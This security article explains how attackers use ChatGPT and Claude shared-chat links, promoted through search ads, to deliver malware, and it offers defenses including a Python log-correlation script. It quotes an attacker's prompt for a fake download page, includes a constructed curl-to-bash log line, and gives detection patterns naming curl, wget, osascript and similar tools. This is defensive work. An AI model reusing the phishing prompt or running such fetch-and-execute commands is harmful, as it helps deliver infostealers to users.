You search Google for ChatGPT, click the first ad. The link is
chatgpt.com/s/xxx. The page loads with the familiar ChatGPT
interface: conversation list on the left, a system notification in the
center: “We’re experiencing high traffic right now. Download our desktop
app to continue.” Below it, a download button. You click it, download an
installer, run it.
Every step felt normal. A padlock in the address bar, and the domain
is chatgpt.com. You were on a site you trust, saw what looked like an
official notice, and clicked a download button that looked official.
This is not hypothetical. It is a real attack disclosed by Push Security at the end of May 2026. BleepingComputer independently reproduced the same chain. Kaspersky had already documented an earlier variant five months prior. Three organizations are pointing at the same thing: attackers are systematically using ChatGPT and Claude’s shared chat links to distribute malware.
ChatGPT has a feature that most users overlook.
When you ask ChatGPT to write HTML/CSS code, it does not just print
the code as text. It has a code rendering feature: it can display the
rendered web page directly in the chat interface, similar to opening a
local HTML file in a browser. Two controls appear above the rendered
page: Show code and Remix with ChatGPT,
reminding you that this is generated from custom code.
The attacker’s workflow takes three steps.
Step one: open ChatGPT, write a prompt. “Generate an HTML page styled as an OpenAI system maintenance notice. High traffic has made the web version temporarily unavailable. Direct users to download the desktop app to continue. The download button should point to openew[.]app.”
Step two: ChatGPT generates the HTML and renders it in the chat. A page that looks like an official notification: dark background, OpenAI branding, a prominent download button.
Step three: the attacker clicks Share, generating a
chatgpt.com/s/xxx link. Then they buy a Google ad targeting
search terms like chatgpt, chatgpt free, and
common typos (chatgo, chatgot,
cvhatgpt), pointing the ad at the shared chat.
When a user searches for ChatGPT, clicks the ad, and lands on this
link, they see the full ChatGPT interface: the sidebar, the AI response
area, and the Show code / Remix with ChatGPT
controls. Inside the response area sits the attacker’s fake
notification. The download button is just an HTML hyperlink pointing to
openew[.]app, a site that clones OpenAI’s official download
page down to the last detail. The installer the user downloads there is
malware.
ChatGPT does not have the ability to “pop up a download
prompt.” What it can do is render a web page of the attacker’s
choosing under chatgpt.com, one of the most trusted domains
on the internet. The attacker does not need to compromise any system,
jailbreak any model, or use prompt injection. They just need a free
account, an HTML prompt, and a Google Ads budget.
On the same day, attackers used the same technique on Claude. Both BleepingComputer and Push Security confirmed this variant.
The attacker created a shared Claude conversation disguised as an
Apple Support-style “Claude Code on Mac Installation Guide.” The guide
instructed users to open Terminal and paste a curl command.
Users who followed the steps executed a command that downloaded a macOS
infostealer from the attacker’s server.
The attack logic is the same across both platforms, but the ChatGPT variant demands less from its victims. The Claude version still requires the user to execute a command—the traditional ClickFix pattern. The ChatGPT rendered version eliminates that step. The user just has to click a download button on a page that looks like a ChatGPT system notification.
Every step in this attack chain traces back to techniques that were already well established. The methods are not new. What changed is not the attack technique itself—it is that each generation removes one more step that would make a user suspicious.
In 2024, ClickFix appeared. An attacker sends an email with an HTML attachment. The page displays a message: “Word plugin missing. Paste this command to fix.” The user opens the Run dialog, pastes, presses Enter. The malware starts executing. The problem with this approach was obvious. A stranger’s email attachment asking you to open a command prompt? Most people stop there. By 2025, attackers made the step less conspicuous: they embedded malicious commands into legitimate-looking websites (hijacking WordPress sites or using Traffic Direction Systems). Users visiting those seemingly normal sites would encounter a fake Cloudflare CAPTCHA or a fake broadband login page asking them to paste a command for verification.
In late 2025, attackers discovered AI shared conversations. Huntress and Kaspersky both documented the same technique: attackers created IT help conversations on ChatGPT and Grok (e.g., “How to free up disk space on Mac”), embedded malicious commands in the dialogue, shared the links, and promoted them through Google Ads. Users searching for macOS troubleshooting would open what looked like a cleaning guide generated by an “AI assistant,” which then directed them to open Terminal and run a command. This version still kept the command-execution step—users would hesitate—but the attackers leveraged the credibility of AI conversations. A “cleaning tip from an AI assistant” triggers far less suspicion than a “verification instruction on an unfamiliar HTTP page.”
In March 2026, attackers pivoted to developer tools. EclecticIQ
found that attackers replicated official install pages on domains
like geminicli.co.com and claudecode.co.com,
tricking developers into running PowerShell commands. The same actor
operated over 30 domains impersonating Node.js, Chocolatey, KeePassXC,
Monero, and other developer tools.
In May 2026, the last point of friction disappeared. Attackers no longer needed users to open a terminal or paste a command. They just needed users to see a download button on a ChatGPT page and click it. This step relies on ChatGPT’s code rendering: placing a fake notification page directly under a real ChatGPT URL, surrounded by the real ChatGPT UI.
Kaspersky reported at HORIZONS 2026 that between January and May, its products detected over 92,000 attacks disguised as AI services like ChatGPT, Claude, and Gemini. Fake ChatGPT apps accounted for 49%, while fake Claude and Gemini apps each made up roughly 18%. The Silver Fox APT group has also been distributing fake Claude applications targeting Windows, macOS, and Linux.
This has nothing to do with AI model security. What the attackers
borrowed is not the reasoning capability of an LLM—it is the trust that
chatgpt.com carries in browsers, in URL filters, and in
users’ minds.
Domain reputation systems, URL categorization, and Safe Browsing
databases all
classify chatgpt.com and claude.ai as safe
domains. And they are correct. But a safe domain does not mean
anything anyone puts under that domain is safe.
When AI companies designed the sharing feature, they signed a product
contract: make collaboration easier. What they did not realize is that
the same feature also signed a content hosting contract. Allowing users
to publish HTML/CSS content that ChatGPT renders as a web page under
chatgpt.com is functionally equivalent to letting anyone
use your domain for web hosting. And content hosting platforms carry a
full set of security responsibilities: content moderation, abuse
detection, verified publishers, reporting mechanisms, rate limiting,
automatic expiration. AI companies signed none of these. But the product
feature already signed them into it.
This pattern is not unique to AI platforms. The 2017 Google Docs OAuth worm followed the same logic: attackers did not register fake domains; they placed malicious OAuth applications inside Google’s own permission system. WIRED’s coverage quoted a security researcher: “What made this work is that it tricked the user into granting permissions to a third-party application inside Google’s own authorization system.” Google Docs shared links, Dropbox shared folders, GitHub Gists, Notion public pages—every major platform has stepped in the same hole. Cisco Talos named this pattern Platform-as-a-Proxy in April 2026: attackers systematically repurpose SaaS platforms’ notification pipelines and sharing features as distribution channels.
AI platforms differ in two respects. First, attackers use a prompt to
have the model generate the phishing content instead of writing the
HTML themselves. Second, ChatGPT’s rendering capability makes the attack
page visually indistinguishable from the platform’s own interface. It is
hard to tell with the naked eye whether ChatGPT is trying to help you,
or whether an attacker has placed a fake page inside ChatGPT’s UI. The
only signal is the Show code button—and that requires you
to actively notice it.
Neither OpenAI nor Anthropic has issued a statement or committed to
fixing the abuse of shared links. ChatGPT Enterprise can restrict
internal users from creating public shared links, but this does nothing
to stop employees from opening malicious shared links created
externally, including on personal devices. Domain reputation and URL
categorization evaluate the domain, and chatgpt.com passes. Filters that
can block individual URLs, such as Safe Browsing, are list-based and
reactive: a shared link is blocked only after someone has reported it,
and the attacker can mint a fresh one with another prompt and another
click on Share.
Of the defenses described in these reports, only the browser-level detection Push Security describes acts on the chain itself: it follows the full redirect sequence, from search ad to shared link to malicious download, and blocks the interaction while the page renders. EDR behavioral detection can serve as a second layer: command-line execution, or a first-run unfamiliar binary, shortly after a shared AI link was visited. Both are endpoint-side defenses. The start of the chain, a user clicking an ad on a Google search results page, is currently blocked by no one.
The security community’s response has been remarkably quiet. Zero discussion on Hacker News, zero on Reddit’s r/netsec or r/cybersecurity, one victim’s self-report on r/ChatGPT with zero comments. No independent security researcher has published a technical analysis of this.
This is not because the attack is insignificant. 92,000 detections is not a small number. The problem is that this attack does not fit into any existing threat classification: it is not prompt injection, not model security, not traditional phishing. The security community has not yet figured out which box to put it in.
One simple rule: a shared AI link’s URL carries zero safety
signals. chatgpt.com/s/xxx requires the same level of
vigilance as evil.com/phish.
The simplest practice: treat any of the following in a shared ChatGPT, Claude, or other AI platform link as malicious:
- An instruction to open a terminal or the Run dialog and paste a command, in particular one containing curl, wget, bash, osascript, Invoke-WebRequest, or cmd /c.
- A download button or installer link inside a shared conversation (a URL under chatgpt.com/s/ or claude.ai/share/).
- A rendered page inside the response instead of plain text (the Show code button is visible).
For security teams: monitor access to chatgpt.com/s/ and
claude.ai/share/ paths, and raise the risk score for
traffic arriving from search ad referrers. Add ClickFix rules to
security training: any page that tells you to paste a command into a
terminal requires verification before execution. Ensure software is only
installed from official download pages or the corporate IT portal, never
from shared chat links.
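The controls just listed (watching the shared-link paths, weighting search-ad referrers, correlating endpoint activity after a visit, and the command-indicator list) can be prototyped over log data. The block below is an added example written for this article; it is not code from Push Security, Kaspersky, OpenAI, or Anthropic. The proxy and EDR log formats, the field names, the referrer patterns, the ten-minute correlation window, and the score weights are all assumptions, and every log line in it is constructed.

```python
"""Triage of proxy and endpoint logs for the AI shared-link chain.

Added example for this article; not code from Push Security, Kaspersky,
OpenAI or Anthropic. The log formats, field names, referrer patterns,
the ten-minute window and the score weights are assumptions, and all
log lines below are constructed.
"""
import re
from datetime import datetime, timedelta

# Shared-conversation paths named in the article; the host must match exactly.
SHARED_LINK = re.compile(r"^https?://(chatgpt\.com/s/|claude\.ai/share/)", re.I)
# Referrers that indicate arrival from a search ad (assumed patterns).
AD_REFERRER = re.compile(r"googleadservices\.com|[?&]gclid=|bing\.com/aclick", re.I)
# Command indicators from the article's ClickFix list.
CLICKFIX_CMD = re.compile(
    r"\b(?:curl|wget|bash|osascript|Invoke-WebRequest)\b|\bcmd(?:\.exe)?\s+/c\b", re.I)
WINDOW = timedelta(minutes=10)  # assumed correlation window after a visit

# Constructed proxy log: "<iso timestamp> <user> <url> <referrer or ->".
PROXY_LOG = [
    "2026-05-28T09:01:10 alice https://www.google.com/search?q=chatgpt -",
    "2026-05-28T09:01:22 alice https://chatgpt.com/s/t_abc123 "
    "https://www.googleadservices.com/pagead/aclk?sa=L&ai=x",
    "2026-05-28T09:01:40 alice https://downloads.example/ChatGPT-Setup.exe "
    "https://chatgpt.com/s/t_abc123",
    "2026-05-28T10:15:00 bob https://chatgpt.com/s/t_def456 https://wiki.example/tips",
    "2026-05-28T11:00:00 carol https://claude.ai/share/0b1c-2d3e "
    "https://www.google.com/search?q=claude+code+mac&gclid=XYZ",
]
# Constructed endpoint export: "<iso timestamp> <user> <kind> <detail>",
# where kind is "cmd" (a shell command line) or "exec" (a binary launched).
ENDPOINT_LOG = [
    "2026-05-28T09:02:05 alice exec first_run:ChatGPT-Setup.exe",
    "2026-05-28T11:03:12 carol cmd curl -fsSL https://cdn.example/install.sh | bash",
    "2026-05-28T15:00:00 bob cmd git status",
]


def parse_proxy(line):
    """One proxy record as a dict; None for malformed lines."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4:
        return None
    ts, user, url, ref = parts
    return {"ts": datetime.fromisoformat(ts), "user": user, "url": url, "ref": ref}


def parse_endpoint(line):
    """One endpoint event as a dict; None for malformed lines."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4:
        return None
    ts, user, kind, detail = parts
    return {"ts": datetime.fromisoformat(ts), "user": user, "kind": kind, "detail": detail}


def clickfix_indicators(text):
    """Lower-cased command indicators found in page text or a command line."""
    return sorted({m.group(0).lower() for m in CLICKFIX_CMD.finditer(text)})


def visit_score(v):
    """Base risk of a proxy record: 0 unless it is a shared AI link;
    higher when the user arrived from a search ad."""
    if not SHARED_LINK.match(v["url"]):
        return 0
    return 50 + (30 if AD_REFERRER.search(v["ref"]) else 0)


def redirect_chain(records, visit):
    """Referrer, shared link, then every later page of the same user that
    names the shared link as its referrer (the download site in the chain)."""
    chain = [visit["ref"], visit["url"]]
    for r in records:
        if r["user"] == visit["user"] and r["ref"] == visit["url"] and r["ts"] >= visit["ts"]:
            chain.append(r["url"])
    return chain


def correlate(proxy_lines, endpoint_lines):
    """One alert per shared-link visit; the score rises if the same user ran
    a ClickFix-style command or a first-run binary within WINDOW."""
    records = [r for r in map(parse_proxy, proxy_lines) if r]
    events = [e for e in map(parse_endpoint, endpoint_lines) if e]
    alerts = []
    for v in records:
        score = visit_score(v)
        if not score:
            continue
        cmd_hit = exec_hit = False
        for e in events:
            if e["user"] != v["user"] or not (timedelta(0) <= e["ts"] - v["ts"] <= WINDOW):
                continue
            if e["kind"] == "cmd" and clickfix_indicators(e["detail"]):
                cmd_hit = True
            elif e["kind"] == "exec" and e["detail"].startswith("first_run:"):
                exec_hit = True
        score += 40 * (cmd_hit + exec_hit)
        alerts.append({"user": v["user"], "url": v["url"], "score": score,
                       "chain": redirect_chain(records, v)})
    return alerts


if __name__ == "__main__":
    for a in correlate(PROXY_LOG, ENDPOINT_LOG):
        print(a["score"], a["user"], " -> ".join(a["chain"]))
```

Run as a script it prints one line per shared-link visit with its score and the reconstructed ad-to-download chain; in the constructed data, alice and carol score highest because each visit arrived from an ad and was followed within ten minutes by a first-run installer or a curl-to-bash command, while bob's visit from an internal wiki with no follow-on activity stays at the base score. In a real deployment the proxy and EDR feeds replace the constructed lists, and the weights would be tuned against the environment's baseline of legitimate shared-link use.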
The platform side needs deeper fixes. Content moderation, automatic flagging of high-risk behaviors (downloads, command execution), verified publisher badges for official content—these are baseline security practices for content hosting platforms, and none of them exist on AI platforms today.
What the attackers did is not complicated. They simply asked a question anyone could ask: if I put a piece of HTML on a shared ChatGPT page, what does the user actually see? The answer: a full web page, under one of the most trusted domains in the world, served with a valid certificate and wrapped in the complete ChatGPT interface.